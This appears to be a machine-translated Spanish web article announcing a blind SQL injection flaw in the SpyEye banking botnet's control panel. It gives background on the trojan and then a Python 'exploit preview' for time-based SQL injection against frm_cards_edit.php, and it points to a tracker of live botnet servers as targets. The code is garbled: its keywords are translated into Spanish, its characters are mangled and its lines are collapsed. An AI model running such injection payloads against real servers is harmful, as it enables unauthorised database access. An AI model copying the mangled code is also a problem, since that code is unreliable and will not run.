Vulnerabilidad descubierta en SpyEye Botnet, Exploit disponible para descargar

Vulnerabilidad descubierta en SpyEye Botnet, Exploit disponible para descargar

Vulnerabilidad descubierta en SpyEye Botnet, Exploit disponible para descargar 1


Vulnerabilidad de inyección SQL a ciegas descubierta en SpyEye Botnet por S4 (uR4 (r00tw0rm.com)

Explotar :
Tipo de Vulnn: Inyección SQL ciega
escritura vuln: frm_cards_edit.php
Versión afectada: TODAS
Puede usar cualquier botnet de: https://spyeyetracker.abuse.ch/monitor.php

¬ŅQu√© es SpyEye?
W32 / SpyEye
Alias: Esta es una lista de alias para la variante de SpyEye descubierta a principios de febrero de 2011 que se ha dirigido activamente a los sitios web bancarios noruegos:
Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Troyano: Win32 / EyeStye.H (Microsoft)
Una variante de Win32 / Spy.SpyEye.CA (NOD32)
W32 / Malware.QOOC (normando)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)
Breve descripción
SpyEye es un troyano con capacidades de puerta trasera que intenta robar información confidencial relacionada con la banca en línea y las transacciones con tarjeta de crédito de una máquina infectada. SpyEye se vende a través de su autor en una forma de kit fácil de configurar, que contiene el ejecutable del troyano, el servidor de comando y control (C&C) y la configuración básica para apuntar a sitios web bancarios. A principios de 2011, SpyEye fusionó la funcionalidad de la familia de troyanos ZeuS, que se vendió al autor de SpyEye, y ahora se está volviendo más sofisticada con respecto a las características y la funcionalidad ofrecida.

SpyEye puede potencialmente utilizar una serie de técnicas para obtener las credenciales bancarias en línea de los usuarios, generalmente empleando un ataque de tipo phishing al presentar una página web de inicio de sesión falsa, que generalmente se basa en la página de inicio de sesión original del banco, pero eso tiene más Los campos de formulario HTML y JavaScript se insertan dentro, para obtener credenciales de inicio de sesión que normalmente no forman parte del proceso de inicio de sesión, como los códigos PIN / TAN. Se envía una copia de la solicitud HTTP POST al servidor SpyEye C&C, desde el cual un atacante puede extraer las credenciales bancarias o los detalles de la tarjeta de crédito, y comenzar a realizar sus propias transacciones fraudulentas.
Descargar Exploit

Vista previa de explotación:
Ejemplo:
Spyeye_r0073r / dir / “versi√≥n ()”
“” “
si len (argv) <=3: exit () else: print "[+]Comenzó pwn ... "host = argv[1] ruta = argv[2] sql = argv[3] puerto = 80 hash = "" lleno = [] para k en el rango (48,122): full.append (k) full.append (0) # valor completo [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # Este es el juego de caracteres para probar delay = 0.5 a =1 mientras que un <= 32: for i in full: j = 0 if i == 0: exit('n[+]Finishedn') # start = time() # start time for the delay conn = HTTPConnection(host,port) #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" } values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" } data = urllib.urlencode(values) print data conn.request("GET", path + "frm_cards_edit.php?" + data ) response = conn.getresponse() read = response.read() print read if response.status == 404: exit('[+]404') #404 now = time() if now - start > retrasar:
#se ha hecho realidad, entonces el personaje es v√°lido
stdout.write (chr (i))
stdout.flush ()
hash + = chr (i)
a + = 1
descanso;
m√°s: j + = 1
imprima “i vale% s, y J vale% s”% (i, j)